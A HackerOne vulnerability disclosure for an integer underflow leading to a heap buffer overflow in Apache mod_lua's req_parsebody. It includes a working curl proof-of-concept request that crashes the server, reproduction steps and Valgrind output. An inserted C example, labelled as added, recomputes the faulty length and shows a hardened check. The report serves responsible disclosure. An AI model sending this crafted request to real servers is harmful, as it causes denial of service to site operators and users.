HackerOne report H1:1434056 by chamal

Internet Bug Bounty: Buffer overflow in req_parsebody method in lua_request.c

2021-12-22 13:20:52
chamal
hackerone.com

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.313 Low

EPSS

Percentile

96.3%

Software Versions

Ubuntu - 18.04 (32-bit)
Apache 2.4.51 (32-bit)

Description

This bug is present in the “req_parsebody” method of the modules/lua/lua_request.c file.
The lines of code below cause this bug.

  ...
  size_t  vlen = 0;                                /* unsigned: a negative result wraps around */
  ...
  ...
  vlen = end - crlf - 8;                           /* no check that (end - crlf) >= 8 */
  buffer = (char *) apr_pcalloc(r->pool, vlen+1);  /* vlen+1 wraps to 0 when vlen is SIZE_MAX */
  memcpy(buffer, crlf + 4, vlen);                  /* copies vlen bytes into that 0-byte buffer */
  ...

The code above does not check whether the result of (end - crlf) is greater than or equal to 8,
so it is possible to make the result of (end - crlf - 8) negative.
Sending this HTTP request makes the result -1:
curl -v -X POST -H 'content-type: multipart/form-data; boundary=-' --data-binary $'-\r\n\r\naaa-' http://127.0.0.1/test.lua

Since “vlen” is of type “size_t”, -1 becomes 4294967295, the maximum value of size_t on 32-bit systems.
vlen+1 is then passed to the apr_pcalloc method; the addition wraps around to 0,
so the buffer actually allocated is 0 bytes long.
Since the allocated buffer is too small, the next memcpy statement overflows it and crashes the server.
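The length computation from the excerpt, replayed on the report's request body as an added example (this is not Apache's code): the unchecked form wraps to SIZE_MAX and a zero-byte allocation, while an assumed hardened check of end - crlf <= 8 refuses the part before the subtraction. The boundary string, the second well-formed body and the part_len_t/value_len names are constructed for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Result of computing one part's value length (added example, not Apache code). */
typedef struct {
    int    rejected;  /* 1 when the part is refused (marker missing or hardened check) */
    size_t vlen;      /* end - crlf - 8, stored in the size_t the excerpt uses */
    size_t alloc;     /* vlen + 1, the size that would be handed to apr_pcalloc() */
} part_len_t;

/* Locate the first part the way the excerpt's pointer arithmetic assumes: the
 * boundary marks start, the next boundary marks end, and the first "\r\n\r\n"
 * after start separates part headers from value. Returns 0 if any is missing. */
static int locate_part(const char *body, const char *boundary,
                       const char **start, const char **end, const char **crlf)
{
    *start = strstr(body, boundary);
    if (!*start) return 0;
    *end = strstr(*start + 1, boundary);
    if (!*end) return 0;
    *crlf = strstr(*start, "\r\n\r\n");
    return *crlf != NULL;
}

/* The 8 bytes subtracted are the "\r\n\r\n" before the value plus the "\r\n--"
 * before the next boundary; the unchecked form never verifies they exist. */
part_len_t value_len(const char *body, const char *boundary, int hardened)
{
    part_len_t r = {0, 0, 0};
    const char *start, *end, *crlf;
    if (!locate_part(body, boundary, &start, &end, &crlf)) { r.rejected = 1; return r; }
    /* Hardened check (assumed fix): with 8 or fewer bytes between crlf and end
     * the subtraction would go negative, so refuse the part instead. */
    if (hardened && end - crlf <= 8) { r.rejected = 1; return r; }
    r.vlen  = (size_t)(end - crlf - 8);  /* -1 wraps to SIZE_MAX (4294967295 on 32-bit) */
    r.alloc = r.vlen + 1;                /* SIZE_MAX + 1 wraps to 0: a zero-byte buffer */
    return r;
}

int main(void)
{
    /* Constructed inputs: the report's body with boundary "-", and a well-formed part. */
    const char *bad  = "-\r\n\r\naaa-";
    const char *good = "XYZ\r\nContent-Disposition: form-data; name=\"x\"\r\n\r\nhello\r\n--XYZ--";
    part_len_t u = value_len(bad, "-", 0), h = value_len(bad, "-", 1), g = value_len(good, "XYZ", 1);
    printf("unchecked: vlen=%zu alloc=%zu hardened rejected=%d good vlen=%zu\n",
           u.vlen, u.alloc, h.rejected, g.vlen);  /* vlen=SIZE_MAX alloc=0 rejected=1 good vlen=5 */
    return 0;
}
```

The example only computes the sizes and never performs the memcpy, so it runs safely on any platform; on a 64-bit host SIZE_MAX is 18446744073709551615 rather than the 4294967295 seen in the report.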

Steps to Reproduce

  1. Build Apache web server with the Lua module.
    ./configure --enable-lua=shared
    make
    make install

  2. Enable the Lua module in Apache web server by adding these lines to the httpd.conf file.
    LoadModule lua_module modules/mod_lua.so
    <Files "*.lua">
     SetHandler lua-script
    </Files>

  3. Copy the attached F1555487 file to the htdocs folder.

  4. Start Apache web server in debug single-worker mode.
    ./httpd -X -d /home/apache/install-directory/

  5. Send this HTTP request with curl.
    curl -v -X POST -H 'content-type: multipart/form-data; boundary=-' --data-binary $'-\r\n\r\naaa-' http://127.0.0.1/test.lua
    Apache web server will crash.

Valgrind Output

Command: valgrind ./httpd -X -d /home/apache/install-directory/

Invalid write of size 1
at 0x483513B: memcpy (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
by 0x501355B: req_parsebody (lua_request.c:415)
by 0x503628E: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5041A1F: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x50365E5: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5030D96: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5035C1A: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5036886: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5032556: lua_pcallk (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x500D02B: lua_handler (mod_lua.c:323)
by 0x15F9E4: ap_run_handler (config.c:169)
by 0x16040C: ap_invoke_handler (config.c:443)
Address 0x12aec000 is not stack'd, malloc'd or (recently) free'd

Process terminating with default action of signal 11 (SIGSEGV)
Access not within mapped region at address 0x12AEC000
at 0x483513B: memcpy (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
by 0x501355B: req_parsebody (lua_request.c:415)
by 0x503628E: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5041A1F: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x50365E5: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5030D96: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5035C1A: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5036886: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5032556: lua_pcallk (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x500D02B: lua_handler (mod_lua.c:323)
by 0x15F9E4: ap_run_handler (config.c:169)
by 0x16040C: ap_invoke_handler (config.c:443)

Impact

It may be possible to use this bug in a denial-of-service attack.
